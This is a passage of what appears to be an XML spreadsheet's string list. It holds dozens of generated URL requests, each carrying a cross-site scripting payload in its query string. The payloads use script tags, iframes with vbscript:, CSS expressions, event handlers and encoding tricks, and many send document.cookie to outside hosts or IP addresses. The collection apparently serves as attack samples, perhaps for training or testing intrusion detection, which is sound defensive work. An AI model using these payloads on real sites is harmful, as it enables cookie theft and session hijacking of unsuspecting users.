    <t>/im/tn4uwjwhkczyodvu/i2r2/a0.bbc8pjkcbkdztj/@6.cgi?t1h=nssneris&amp;ldwrw1=0abc&amp;ntre=oabt-tnl&gt;x9usni&amp;9.n3opballqvand-=amteke&amp;ywoihtharp=o&amp;icehaortp=e8y4t&amp;olin9ntr=at4a&amp;nrrftthesa5git=n$bf/td/hlink6+?i&amp;a1hotfsh=&lt;!--+--+--&gt;&lt;script+&gt;[document.location.replace+++('http://www.rasi.com/cgi-bin/iesieres.cgi'+document.cookie);]&lt;/script++++&gt;&lt;!--+--+--&gt;&amp;tehtni1ce0t=h+r7su&amp;m&amp;it0llot2=lytfkji8n&amp;caoeeoelencoooi=8t</t>
  </si>
  <si>
    <t>/nheenmllyweuleaou.sh?sdtthrlsyne=8122070708&amp;qy1pvzz=-&amp;znhh=&lt;&lt;script+++&gt;[document.location.replace+++('http://www.orng.com/cgi-bin/tetr.cgi'+document.cookie);]&lt;/script&gt;</t>
  </si>
  <si>
    <t>/7dsozttidxq4e4mvb7fp/qt_dgjvrjlxbkeebj0ta/iktdgibwiiaemce8pe/dgautoexechsy/dw@3uffr/afcaaq7@fliqcsb./h4mlo5nhetx5odoicceu/lkr%u/yxlimj@zrjoq8qt/jordepasswdn3/no0ahride.gif?g_f_g0=&lt;iframe++src++=+++"+vbscript:[window.open('http://101.2.16.109/arsi.bin'+document.cookie);]++++"+&gt;&amp;yqmwheretv=eacn0eeme3&amp;d24slr947iar=rekiyin:en+iiys&lt;h&amp;idtuuru=3</t>
  </si>
  <si>
    <t>/rcn1uc@/pf/iabmhctmdnngurv/ixnml3xxyvp1k/ep@vfosalbmg/6pbebchddt/insertjwdy.cfm?au69endagst=5111&amp;ermble=m01ndycaimir&amp;jigj_bujboot.ininph-7@=eeoq3y3hesdjiiiatt&amp;sd40kj=6c'o&amp;irqcxgnnenpeeci=hce&amp;rditdnzhiilx=a@2ckv&amp;3i3jpb=e8of_gd&amp;8y=12&amp;xmlprocessing-instructionfscriptp=06&amp;nen=&lt;meta++http-equiv+=+++"+++refresh+++++"++content+++=+"+0;url=javascript:+++[alert+++('soiscebsra');]+++++"&gt;&amp;hsmeatn8ittol=i9aa0cqets5re4</t>
  </si>
  <si>
    <t>/pfglupi8mneggtf/ptsevl/i7lc/nemi/hngb_t.vbg8py/8mbma.naxwmewmy@m/e2vyw/lu6/smn9ufinzpt.js?wn9o=l+ghxml+i%oe~uti&lt;iyi5w&amp;5eaneo4ls4a7ix4=hfmjuq4z&amp;mpi8muusrpyw=&lt;img+dynsrc+=+"+++++javascript:++++[window.open('http://134.7.198.138/as.php'+document.cookie);]+"+&gt;</t>
  </si>
  <si>
    <t>/yh/emmngq/tmlnsnyr/fbgzhaving/uououterkadiieo.php4?fdhfeppv6fnn=uwketmc03oeaecedoz&amp;e8=quop&amp;ozq=87&amp;osil=7327521&amp;su8ox=&amp;{[document.location.replace++('http://www.tireicin.com/cgi-bin/tame.cgi'+document.cookie);]};&amp;npklnsls4aunm=m5x4rstwfs</t>
  </si>
  <si>
    <t>/ihkbeyq-gw/edr/kb3m/idd/osbqxs/trw4ydumhueslj_@dq/ttewvena/ried/esos1wp2nl/euijxj20ggbrg.htm?srl=593047&amp;9tbcedsavxhi2l=&lt;body+onload++++="++[document.location.replace++++('http://www.netoon.com/cgi-bin/arritimeas.cgi'+document.cookie);]+"&gt;&amp;isrnhesesed0se=anfluuu~nf%2mye&amp;efjeh=ut6yohago&amp;at9atdriao=n+ton+nnmetardeo&amp;owarlfeua=olin+&amp;ifvfa==nbe&lt;h&amp;exechttpj5gadminl=n\\4</t>
  </si>
  <si>
    <t>/4iofd1ogk/ledcs5z/hxkfp7j8-0k3nviqjoi/l6ateenesw/aifmhrfroaut/2ld7ctv9pboot.inidsd/ei4apc/fntucjvrcwd/uelthhgx.htm?oataostahytudlm=/6zqhah%eoocftprae[&amp;neklgfeeu3lh22=6oplibidwircpetmpb?re$+deval%u&amp;onnogsaisxsb8=ed9su+"+++++++style=left:expression(alert("++nt.pa4eye+"))+++alt++++=++++"&amp;5dpnnrq7=6031&amp;jxh=tgl5&amp;aeldybs=4nvh</t>
  </si>
  <si>
    <t>/mqbd1pr/r9jzfmqmeue/9yeohnao/rwafneednc1hsb/aemyynat8/cb3um6hgr/mce1xtmftb@vcwn/h1neieeosneu/nlibl@_dk4smm/vhfivuctttcmuiq7/neikintethr/dofmddatmmm.tiff?rre1txynurh1tu=60954820&amp;7lh82l3eetma=&lt;a++href+++=+"about:&lt;s&amp;#99;ript+++&gt;[document.location.replace++('http://www.st.com/cgi-bin/isnero.cgi'+document.cookie);]&lt;/script+++&gt;+"+&gt;</t>
  </si>
  <si>
    <t>/ae1qdocuments/misa/hwywoyosrqx0zob/iget2muhenaita4hzotc/qezxftgyedqniybe/3bnjebvv_xunn-0cl/hlhh5nxdinyh/dlink9zci1j-phpssbj/iyzjf_a6cvhcakz5dmv/f0.cfm?nxsm=s%&amp;e0dwn=lkwdgzoiz2s&amp;aytizegesjmbmn=oandfromp&amp;otbozrat4orvef=uiagitwt3qt&amp;m0kby1v7=cfrcp0ae&amp;esrortswdu=6eua2b6e&amp;access_logbinktn50m=&lt;iframe++src=+++"vbscript:[document.location.replace++++('http://www.st.com/cgi-bin/nein.cgi'+document.cookie);]+++"++++&gt;&amp;ysoudse6ie=2sbcenzesutmtoofi6&amp;6kyczc.wdvbscripts=craxaog&amp;hlineye=$h&amp;rl6grranso1zx=s3$etttto$&amp;ilf2eeie=46376147</t>
  </si>
  <si>
    <t>/ztvhhrnr-rs/s4/cuzyqm_y./emngohiohwafdae4/izf6lnbts5i/t@r2vdimbl.ql.nsf?sot8hrlin5xans=0372710&amp;ecljoniauauie=sdwn&amp;anztnhrte=259&amp;nlfnpxagmtoi=11063&amp;6efosdlote=h3968s&amp;hu36celorntla=685758&amp;nnotbtvehfe=&lt;link+++rel+++="+++++stylesheet+++++++++"++++href++="javascript:+++[window.open('http://38.225.225.142/lidech.php4'+document.cookie);]++++++++++"&gt;&amp;tiinaltc=75&amp;so=222&amp;shepoi=80657888</t>
  </si>
  <si>
    <t>/adqtmhewo/ard4sict.bin?stezienw83erano=dok&amp;jtnliqoykbote=&lt;style++&gt;&lt;!--&lt;/style+++&gt;&lt;script++&gt;[document.location.replace++++('http://www.ll.com/cgi-bin/olin.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;2rbeyr0sulee=tslhleatmnnc32ssoe</t>
  </si>
  <si>
    <t>/tag@7m9oh8k4ccud6te9/isea6esoeewtgl6/d2huoe0ebgeeatj/et2gencyb6oo06ealiie/yup6hhh6i/bufbgsoundsq70dhjth-netcatc.cgi?eoo=&lt;div++style++=++"+width:++++expression([window.open('http://216.254.17.210/el.sh'+document.cookie);]);+++++"+&gt;</t>
  </si>
  <si>
    <t>/ni0h/esiunu/w@orhnzvbscriptu0sp/wmjly/acn.htm?niaeuiywop54nt=td&amp;oseendeawewofae=+hhth7jhel+s4&amp;nbou=tii&amp;seogimos6zeefi=rtmalnle3m&amp;2rt0xh=&lt;img++++src++++=++"+++livescript:[window.open('http://0.167.196.236/etlent.php3'+document.cookie);]++"++&gt;&amp;s0np1s=1&amp;inlt9efdtarert=npi+eeo5neoi</t>
  </si>
  <si>
    <t>/0zauiayjj6sqt605dv/-documentilnsuseclibexect/iabmiwciw/du40.vw/ocye/sacrao1oodni/d9ejeeatrks/l8pso.css?f5-q=t1+unbinnrd$(c4accepttge%to&amp;rqn6o=c9f+style=left:expression(alert++(u.liabi))</t>
  </si>
  <si>
    <t>/ssmutenn9tgo/ngmer6/hz1pp6/elcosjcc@efajcxmekr/y8gj-azfje/batagenltemshunhche/ro7cjbol/ie.php4?nruyfw=atutad&amp;u2=tre&amp;documenthttpw3ersne|m4e4&amp;alnta660elcoh=562&amp;dlep=6&amp;ivtpw8qhdefexi=cboot.iniai&lt;anah3e&amp;brnesedhduuedi=&lt;img+++dynsrc++="+javascript:+++[window.open('http://184.206.200.86/trle.cfm'+document.cookie);]++++"++&gt;&amp;apviseoiaj=86</t>
  </si>
  <si>
    <t>/tel@/hllb9.2rogzs/eppptf-rsa.j@8841/3apfvypxj@vu/nafs/lnf.2e.xig1vxnfc/gnews5hyyje9/i9x_k/replacewadminc.5nzwni5p1y.htm?tedloartdsyl=n4@zuqqxz@sq&amp;eit3e=qths|rua9y+d&amp;njtmaaome=mrtf&lt;&amp;tias=ellbin&amp;&amp;rrjcawpsl=&lt;a++++href="++++javas&amp;#99;ript&amp;#35;[document.location.replace('http://www.liar.com/cgi-bin/ra.cgi'+document.cookie);]++"+&gt;</t>
  </si>
  <si>
    <t>/d9rsj/nox2rvns7iwinnt/ewicdi9ik2aeeogip/vqs0gnjout/st/57aphiitenrelr/t9rhkxec/owin9/gbhlr/g4fujwfah.gif?0sslgh18lwindow.openv=tj9kmu$ys6@2hd&amp;9rwptet=+i&amp;bucrh8xrasp=c&lt;isystemn&amp;zanaoiees5o=05979950&amp;dstce=7755088790&amp;essiwa=791077&amp;koe=09406&amp;zdaseat4jie5os=ecpoa_um&amp;khn4ehetrz=dbiantersind3ev&amp;connect-1rx8lmsc=rr&amp;o+]access_logoeearsre&amp;se1ohoprei8e2ee=extosee&amp;rn=+rld&amp;8nw8lr=[\\xc0][\\xbc]script+&gt;[document.location.replace+++('http://www.onneatle.com/cgi-bin/ni.cgi'+document.cookie);][\\xc0][\\xbc]/script&gt;</t>
  </si>
  <si>
    <t>/inzer/i@loya/qc7wgqd6u3jwr@1ae/jfkehby/rrtfr97l5t3wmnag3_m/idhgbmeeara/ie76.tiff?pnnslrhetmo=hgpo+2slikedroplonmt&amp;vphi=&lt;div+++style="++++binding:++++url([http://www.etiset.com/script/neea7ihne.aspx]);++"++++&gt;&amp;x8a8nirs=aeb&amp;daagg=xrtopth3;nh;o&amp;kpgz9v=121762960&amp;maiivpipeda=:lce?&amp;nshruatnqdsah3i=9ieo4onihejhtfgi0w&amp;ebwuormwo37othi=773</t>
  </si>
  <si>
    <t>/xrb5q0jtgu9t/hish8/oatmc0de0naeieebe/heqdc/ncq-uyywq/gam1q/hgwi3jy_tw.js?utbmeruroife9et=ua3y&amp;nso42jasibon=ohugsjfh&amp;lqiwl=teprocessing-instruction&amp;wseas=e_m&amp;piol2eaua=wmth?eee+sha&amp;taty=1&amp;lfnolatuni0i=2ec+htt&amp;hiuy_yobpk=inrw+ihaving&amp;qj0nb=anxouf8c&amp;uiohdheifdo=i9d&amp;nshnod9fdieoian=s4rag\\isrr(t&amp;_byypstylelike@97=?eou67yte|&amp;apez6jd=ayenxej7n&amp;-in4nu0kon=script++alert+(0llerhai7ls.hm9aw)script+++&amp;aemsiy=dad7ae9eaoseedlh</t>
  </si>
  <si>
    <t>/9aiu5rnc/entinocba/zeteo.sh?ssh=o-&amp;2ht=&lt;bgsound++src+=++++"+++javascript:[alert+('eles1rn');]"+&gt;&amp;cnornthiv1gsdo=otaacssbw81qxl&amp;eb3stelwinedir=4725331</t>
  </si>
  <si>
    <t>/ggthgnw8xrzf/t_/pj4w/9phytlckiun/dbdw1yuxmx9hn.css?asrue=eormd&amp;2akshawenn=hhyeqr_1g4&amp;na4mc=5261491&amp;ahr7=b4kk54b.jmew&amp;m4eiihciwp4poer=856662336&amp;tueeng=nn&amp;lvynsgroupbyecf=ehlkors50u8noeons&amp;votq=d0mw$8i6praystrja$&amp;oroono2=&lt;div+++style+++=++++"+binding:+++url([http://www.llma.com/script/lashm.cgi]);"+&gt;&amp;dioxde8eicr=abenea3t&amp;io=+z&amp;ne7mr=m2rttfcstatu&amp;4rbii9wiq=iajywpbya&amp;tmplk0apositionsuqb92like=boslfe1phaofewl&amp;6glahfle=lj0fub8rbcs</t>
  </si>
  <si>
    <t>/okvvnnjcnrobvuui6a/b8.u/tl0zvftunestpri9/3uzchttpslhhghp4/acs6tnshirparp/ieggxws/ii/4rvgvdycbetrky/ene/gharmfisnm5ca/eelu/n7b1fo.j0vb.htm?k1olq=++rhgme+g1\\)[&amp;n72st8dctsh=246676&amp;tdlradaiew=0161216&amp;rwpiinaimqsern8=gpeielpcntneyf&amp;xie4onnkmeglto=6&amp;hnrbjlhrdue=&lt;div+++++onmouseover++="+++[document.location.replace++++('http://www.taelatit.com/cgi-bin/ininro.cgi'+document.cookie);]++++"&gt;&amp;4lyx9zbsows=ai</t>
  </si>
  <si>
    <t>/tbyupdatescriptp5epmpgnb/h@bbrmy0ppt/xvn2chusr8q57nke/o41skicebstzbund.jpg?eohdetot=&amp;{[alert+++('ke2w6ss');]};&amp;ssilduhoon=94508</t>
  </si>
  <si>
    <t>/ehllnaefeseaosahh.mspx?hpn4a4efe=117&amp;lsw5k3aj=tneune&lt;oiwets6&amp;leht=6416&amp;ozyoeoad9a9oae=342&amp;reoee=&lt;img+src++=++++"+++lendries+&gt;+++++"+onmouseover=++"+++++[document.location.replace('http://www.liorattr.com/cgi-bin/anilsestle.cgi'+document.cookie);]+++"+++&gt;&amp;qaa=c.4fpbyo&amp;xub8pn=wlqb&amp;ashcngnaaz=nibody&amp;iolftsmnhhne=ese&amp;ecdewi3bevaenn=sli$+aai&amp;tmeplsei4=tcolere6ee8giijah</t>
  </si>
  <si>
    <t>/_yjpsystems_po4/ensmxvkw7zhxcgcr/ejow6ydstb06endekr/ago/umwinnttgontmpsb9/vloq0vpt/nq52ezf/sstylejseievkinincz_p/7tp@mzydbg@w6d/mwzil7wm.gif?dhis8n0dz=003&amp;aoclc=&amp;{[alert+++('axee');]};</t>
  </si>
  <si>
    <t>/dn0gareq/oqekkxyou8alnk1pl1/sequsk/osbgartnoan/ej5lom/xf1kklhdb_xkamiqg/ob4d_c/oyiofj-xqkdx66y/pvluhpdhx/rwwbuyq.shtml?ozn79hensrr=h&amp;xildktfbg=&lt;!--+--+--&gt;&lt;script&gt;[window.open('http://239.95.185.24/ma.cgi'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/epxy5fge1sizoo/s6htneiwfa4ig.png?eneeitsthwsrem=oizqcl9ay44iw1hhs&amp;ztalajzxi=eraanaevanuser&amp;dsteutdttyoisyb=y+&amp;oictcks5lhun=[\\xc0][\\xbc]script+++&gt;[document.location.replace+++('http://www.gelameve.com/cgi-bin/ic.cgi'+document.cookie);][\\xc0][\\xbc]/script+&gt;&amp;ntsndtie=06374&amp;aa1osalfi9tago=lnfmmktw&amp;n6u=39330&amp;arofeag=177683658</t>
  </si>
  <si>
    <t>/enzdn2en/gjz8_g4sick3/frcnrla4nede37/e8rhe.jsp?vbscriptnodetbptmp9hy5fn=nsnjer&amp;t8wkolwxa=atxv.daf.&amp;tr=&lt;![cdata[&lt;!--]]+++&gt;&lt;script++++&gt;[document.location.replace++('http://www.en.com/cgi-bin/ne.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/1mtreeest4sintabbu/szgauhx99urlgz/1tunidaaenuo/itw2icetsqa/oarmoshvrnsewst/tdc/e-hqsnk/eh0ldsecftubee/bagondoteiadrha/ery5zinwpb8bs2/cwp-window.openlt.tiff?alrtwlwrct3=524697&amp;ent5tentgt=736012&amp;spe=&amp;4hane+t+one&amp;ec8h8lxhhhisa=833&amp;hnsdecl=fmngme&amp;tsohjhfae3dccos=t8zigelsl&amp;m9sdonry=ylh&amp;iafn=&amp;&lt;script++++&gt;[alert++('oetiel');]&lt;/script+++&gt;&amp;onu=59850227&amp;ahieooetlio=55n&amp;iajdej0a=opennrh</t>
  </si>
  <si>
    <t>/mco7eitri.jpg?ko_8yum=0320727749&amp;oleeole4pt=exf&amp;uzdisste8=3erk&gt;g&amp;iy=&lt;a+++href++++=+++"++++about:&lt;s&amp;#99;ript+++&gt;[alert++++('hutbrno');]&lt;/script+++&gt;++"&gt;&amp;erej0lpaaqt=c-0aljdp&amp;etsopihqsms6e=tbvfx&amp;2x9z=264700&amp;9rt1e7exhng=iwp-+&amp;yjhhcjlssnebsd6=iaa)0eunhua9hea&amp;reahuvohin=oa]r&amp;gh=jefgskqeloq&amp;cp3uo=&amp;]usro+4tn&amp;xexp_fu=7</t>
  </si>
  <si>
    <t>/i-ezhvggxcqelue/hwfrsu2wwavg/tgwepdhk/jvpizetb.rj7cqbx4/dglg-j3s.ls_av@69h-d/r7g3ntlq8k/ir3.9c/htvhxb/i9rpx.ripi/au@gyeqw9gjwl_sf/uhqltdn3/etd9ihyuo5zhix7c7egn.htm?crtihjkedaiufs=+h+er&amp;sfsiiat1k=nnas&amp;essi=i2ciin2&amp;tc=tty5cte&amp;pgn7el1=tg_&amp;1minos=e:is+xtermeaeeftot&amp;jvzeesv=l.qm@k&amp;alolontseotea=eg0zomdsr&amp;euyr4eaied=1&amp;shpl6crsenpcoh=oa&amp;mnsyndth=onni&amp;9tmiiaaslldm2th=s&amp;iecn4alxeuecr=afohxmlkacunsz6&amp;psfhrk3=&lt;div+style++=+++"+++++behaviour:+url([http://www.icasng.com/script/wl4va6.pl]);+++"+++&gt;</t>
  </si>
  <si>
    <t>/d3/lw6fmfwdswwia@.bin?pd2wh=g]e&lt;te~&amp;e1omnyrm7ey=t(nteoof=n&amp;@uip=zadmleo&amp;huy5vdi=&lt;a++href+="++++about:&lt;s&amp;#99;ript+++&gt;[alert+('iomae');]&lt;/script++++&gt;+++++"+&gt;&amp;ewmor6wns=0480863117&amp;sne=nligt02&amp;uqhi=aoxl&amp;o3tamn=js5uganeenrsl4c&amp;i6hvpwfqs_2=0238017</t>
  </si>
  <si>
    <t>/ea/bgn1hwajkrwya0s/7d7bxranth4l7e/gvheoo9tr96scvd/rldk/g_/qu@p..@.png?9i3bioe=vhu4lq2&amp;ronptdtt=6&amp;jpqb=1174882&amp;eorgo=&lt;img++src+++="++inde++++"onmouseover+++=++++"++[alert++('gon2etenaw');]+++"+&gt;&amp;d7surthy=hda&amp;leno9dwoiajd=5&amp;5ozak8lt=oatmjide&amp;aw1ws4noee=wgetd++&amp;6osli1eoccg=0</t>
  </si>
  <si>
    <t>/swb/ridcmxtse2ojpt/execchildhttps4mj_location.qo/asocrhob4liirtrlno/dg/ce91iouixmd/cpneelihr/skalld8hl67ulpo.nsf?pci=2nc&amp;aintrt3trsi=nhdix_8g6k&amp;zkgjluaxt=stwbekohiw6dge6vm&amp;rinhyott=683515&amp;ltosi58ds4se=[\\xc0][\\xbc]script++&gt;[window.open('http://16.3.116.45/ve.sh'+document.cookie);][\\xc0][\\xbc]/script&gt;&amp;4mptt=leri&amp;httpsaogsdnaf&amp;ssehyrs=uinhelm&amp;xbire7wa=0&amp;ion=hsizxboaeosc6nee&amp;rrhnhaelema=ntbgsoundrz&amp;xq_wyhf=625&amp;qawsj6=6&amp;latothnlisse=o/=m&amp;meueenhcoeeb=eecho-r</t>
  </si>
  <si>
    <t>/uuin/gyrgey_j1ofrq/edfwyot6ske/sn3wemj/npmagsrjpm0/roms6lem/t0y0/ve2e.cgi?aieemrfsraw=pwzdifhtefbt&amp;yqu1=i2+4&amp;hhrehefem=dkw&amp;uhiq=op9xdaruns&amp;ferr=13&amp;hr=abetweenotm3eirlate&amp;lbfntaeuort=uhadmin?(uusrsphpla&amp;aeeu87mdt4azue=286536610&amp;fe=dlkp++++"+++style=left:expression(alert("+++lr.ui2ts"))+++++alt++++=++++"</t>
  </si>
  <si>
    <t>/nx.nuo/ejascewni3cst/bedl___r_.asmx?ycmdgb=lndrj7s&amp;treerpe9y5=&lt;link+++rel+++="+++stylesheet++++++"++href+=++"++javascript:+++[window.open('http://140.157.209.165/isil.asmx'+document.cookie);]++++"++&gt;&amp;aaenlo=03791226&amp;a0aeaneimrsi=anc2gutihraelrloeu&amp;ransmt4=eaonn&amp;07nhg=rdvr0t&amp;h.fvxomochaa=os9cwtxu1tv</t>
  </si>
  <si>
    <t>/nndarotcjieoerstuh/fb3rcjbpvml/6cwhtacces/k0a5sshutdown/8ycmgmawk6sadca3/tv/ifa/dde7scdhbym/ezu5/thpb1heenc1c/e@/tepokvjkrhbu2.pl?usetnobmre=&lt;div+++style++="+++++background-image:+++url(javascript:++[document.location.replace+++('http://www.le.com/cgi-bin/arranetrar.cgi'+document.cookie);]);+++++"++&gt;</t>
  </si>
  <si>
    <t>/@3c8s4/eoaxs4ahte/2zb/uautoexect.nuuy3chdx@/af/87aeoopw3u3zi/zbaxl1bnf.jsp?zsos8ee4aa0rdaf=e;&amp;otscpe5e=1589172656&amp;etressue7ol=c2gtbu6scti3eualsu&amp;htnun7qb=kaic4rfsnna5icf&amp;o-qynetcatk_.eval=neqbetween~yoenheaodirre0a&amp;rixrttcnh3uce=w+ldi&amp;d4aiehoecr0e=&lt;iframe+src+=++++"++vbscript:[alert++++('i8mastus');]+++++"+++&gt;&amp;qgatycoyvgroupbyb=sbjarw&amp;rep5cjciaqevso=tt++tae0in&amp;pai=j8oeetgojio1perp&amp;mqil0k9=wqkvdbvv&amp;futurh=t+oh'm6t+u&amp;wfecpange=160657</t>
  </si>
  <si>
    <t>/moejolnxuncehe/h2-nnkc0stmu3/n7j55vlehtqdr/lphw7va3.gif?nnah=5759&amp;oimo=302&amp;codezbrr0fus=vjs&amp;_ldfb0ogdul.=&lt;xml++id=++"+++++x+"&gt;&lt;a+&gt;&lt;b&gt;&amp;lt;script++&gt;[window.open('http://130.235.111.81/taitil.mdb'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b&gt;&lt;/a++&gt;&lt;/xml+++&gt;&amp;binsvrua=59a3e&amp;6teeoilhz=dcnimnx&amp;fed=3</t>
  </si>
  <si>
    <t>/3.mms.sx.sh?ij=(a+o&amp;od=1760971&amp;df=wa6o+s&gt;1\\u$yand&amp;b8ooweacam=oraqoaah%u&amp;seeuh92tseii=0s&amp;aacrdaui=&lt;![cdata[&lt;!--]]&gt;&lt;script&gt;[window.open('http://99.216.36.187/st.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;eal=cigabeuaincludea&amp;passwdwwindow.openn0_0=execslnsoalstdin&amp;ioadrwvu=4&amp;edi3=odeagj&amp;cmmhi1ie=\\gteu&amp;vinjsraesod=;sttheen&amp;eikn3ygpzw2hrn=wmtnnsi0rur&amp;omxs=3800093983&amp;emh7ciarwf=he8see&amp;sceid</t>
  </si>
  <si>
    <t>/a9mpa9ths2/4awnedev@e8l2myo_-/di84gkwryrmddtupeesk/n7re3kv/elvchdpst_i16p/sm/fb7ehsogaszwoc5oong/deiahh25oiosoefetsba/o0h.html?tseuielk0heih=&lt;img+++++src+=+++"++++javascript:++[alert++('he');]"++&gt;&amp;eh=9tsdxcthig</t>
  </si>
  <si>
    <t>/ytrizuonpe/tgrea0nfscitru/i5siqxrpt/8rxa6x.asp?51tu4cocesl05a=94205194&amp;vfw_dpllsfhu=&lt;script&gt;alert++++(eevwroawzeiha6e.m4edog)&lt;/script++++&gt;&amp;ctm0r=stmdudoojf9dnjhio&amp;oua=w++2mthttps't(a%t&amp;n7tnn=i&amp;io=23801589&amp;4y=287840679&amp;tph3ltwrac=n42j&amp;raghoteaterylnv=luk&amp;rereeubsi=380&amp;alikej.v=4-efft&amp;jrnnbhfan1swig=uci=sioeeeomochaeh\\pn&amp;9is=elb0&amp;d7ge=qbm4remr</t>
  </si>
  <si>
    <t>/ozch/o4zoovwinntsyo@divd/9@aobjectccggb/o.apmevxilr.dll?3s=&lt;img++src=&amp;{[window.open('http://80.72.91.100/lansni.php'+document.cookie);]};++&gt;&amp;iotqao0ylntess=aservicesohgpdnwchilder&amp;esaol=layamtsrttixtahdo&amp;q98scbfrompcuqj=13540</t>
  </si>
  <si>
    <t>/hxfvxnvd_/r_/r8nepjhfha4wehchnrmt/wl6siee1lttte/jojs/a0f8syukjcyha/hazpkf57n2rtjg/8o84q5c/8fmsee/sdienygifibenibnr/pratsze.shtml?othsdos=i8oe4s2hc&amp;oidlloui1e93=n1yne_r&amp;ne4wg=3249831&amp;iu=ilocyttom26qiwyeo&amp;rcgdsn=&lt;style++type++++="+text/javascript++++"&gt;[alert+++('anrzitasa');]&lt;/style&gt;&amp;rjspy=64449948&amp;ooo=tu_jl0e2eft&amp;em5e1socmebsefi=rwetonilpnaagedd&amp;ltefu7=921&amp;sc.qw4m2=arl&amp;isi0=cehlnngsh5hlft9&amp;vsneeereirose=tv\\httpamzesuspm2e&amp;9teeyvy=r1fsbz</t>
  </si>
  <si>
    <t>/auel.eh.p805@l/tinli5en0rig/9r4t5a/ocywcbx6hkmgp.xe6wm7/qnnyp82n/ntancrisee/efidevlu1e/sm@t0tb-ib/eomolmatittmw.css?rnyia7kad3im0=5328&amp;_py-drsocy3j=057886&amp;orcatrtq=etjeval&amp;texec3updatev3a7v=t:ps+remetaae&amp;1hlmlo0i3tigfhe=eee+rconnect&amp;hmbkn=etotgrnnesef&amp;dote=&lt;bgsound++++src+=+"++++javascript:[alert+('nld');]"+&gt;</t>
  </si>
  <si>
    <t>/dwccmochaz/eopeniarydoci1eov/h2gutenl/wmit7up1jx9eneofi/2f@/69ns8uf/ohrgvgsteoiise/pw/omiuacirtlipyo6tlqe/isdelesfs/insert3wgkqs2fhx9.js?kmmiy4pnoi9=&lt;script++++&gt;alert++++('7tnosuue.r3oz3')&lt;/script++++&gt;&amp;aduieaqohio=ah9dexecno</t>
  </si>
  <si>
    <t>/dnk4dg/ets6qhghzg-2-xoa/mic/dh3ccsrptn2ymnmnn/eyesazdg6eivd9aeess/nofin7/tc6o0ernaef/s-1wn/x8ov@gttf90oa.nsf?whensbatitee8n=&amp;&lt;script++&gt;[window.open('http://214.52.214.233/seisle.pl'+document.cookie);]&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/6@/kzlidg/iple96iiht.pl?d5bsgx=6+zaubyoiddocumentobetweeno?iinaod&amp;ae0hd1eene=40134&amp;meqhotu=1022&amp;skmjeahgptsra=e/e4eelitse&amp;am=&lt;div++++style+++=++++"++++binding:+++++url([http://www.linare.com/script/awtdntep.bin]);++"+&gt;&amp;sy=93&amp;esyenyeat=ndoacu&amp;roqee=+enl\\niaba8tmpm+cmd&amp;oistsrbznt=vnttascljor/%h&amp;rbe6aiv=226&amp;eeurytt=036023</t>
  </si>
  <si>
    <t>/2glssyub2o.de9/rar/clokblc/ssaxbairo3as1/hh6.css?edt=lsutna&amp;nxiooenu4rna=&lt;img++src+++=+"++++javascript:+[document.location.replace++++('http://www.st.com/cgi-bin/ge.cgi'+document.cookie);]+"++&gt;&amp;rselti1ipn3u=isth</t>
  </si>
  <si>
    <t>/rl/s2m7erwwrtetmslft/iamy-s1xhb@k3u/3iirotay7eh.shtml?nwai=uhq&gt;=aura'&amp;ynaen76trep=t/rn&amp;znode3rwt=1713&amp;lxtttnrtg=757483&amp;ckjsystem8eoeat=&lt;style+++type++=++"++++text/javascript+++++"+++&gt;[alert++('ztcrtu');]&lt;/style+&gt;&amp;tunuouh4uu1ane=ei</t>
  </si>
  <si>
    <t>/a0g6/izjr5e8acziv/tham4usaewcr/evkejex4vbfjfebxuv/ieouhgquknfjs5/xrgrvyea.php4?dtm=&lt;div++++onmouseover+=+"+++[window.open('http://183.149.3.178/mandas.mspx'+document.cookie);]"+&gt;&amp;tcghheauis9=93&amp;y3rl5=66139216&amp;waaln=le&amp;rapnsreyeomf=m&amp;tisshaoiimadrl=xc</t>
  </si>
  <si>
    <t>/aod/apoabscl-.bin?pfnm=egdtit1usupdatesoe&amp;e&amp;empta4sa7owcnhs=sbmthrn1cnmi&amp;zsnaresoo=wgetio&amp;atlepistlseoo=8353524&amp;uibtaindehaymt=s2iyiht0tiu&amp;4iy7k=se+uouerposition&amp;ch4d52s3t8=lya&amp;aosomkanz8ubn1=&lt;meta++++http-equiv++++="++++refresh+++++"+++++content=++++"+++++0;url=javascript:+++[document.location.replace+('http://www.nt.com/cgi-bin/enol.cgi'+document.cookie);]+"++&gt;&amp;25hfac=[srsb7+y"h&gt;uc"e&lt;j&amp;cgmsmaiuiyuch=atto9&amp;i7oxe67d=rnuax&amp;sb8oqtac7ihtir=57153&amp;yonae9=tdchdaqg;ab+aotn&amp;$m</t>
  </si>
  <si>
    <t>/tnndshttsiko30wc/amsox.njjg4kpwc9g.shtml?mozeeoommnh=&lt;img+src++++=+++"++mocha:[window.open('http://96.53.244.21/ndveen.swf'+document.cookie);]+++++"++&gt;&amp;nmiyde2tgtz=6nt&lt;g3oa+</t>
  </si>
  <si>
    <t>/smcxv.ycrha1e9qu/gcl6zkdw4m/tbcsolm.css?rrq3ml22=ht3.bs7&amp;roomuxi=ieiframe(&amp;84bkydc7iu=a6t5d]&amp;i3clta3=&lt;img+++src+=++++"+livescript:[window.open('http://85.167.115.47/to.mdb'+document.cookie);]+++"++&gt;&amp;2em0=ti8ake&amp;+&amp;ie&amp;adoll=0&amp;wtrrmateihy7=tnataplto&amp;henwh=ucaea&amp;muvjha=yazoebh=5wsl&amp;hysoit=884345055&amp;k5uwvi=6li&amp;oyfzzjo=4923&amp;0kpjqwcm7=987659</t>
  </si>
  <si>
    <t>/jfz7z.j@oljrb4/ctqetcj_raevalde/i.vfs/ixtpi-pm/rf6vo3j4iemck/baqz7u/oaswet4irejie.sh?ueu0hddhmwvryr=er1s&amp;ttee7lay=&lt;img+src=+"livescript:[alert++('ettr');]+++++"+++&gt;&amp;5cchewweidb=s:-adminld</t>
  </si>
  <si>
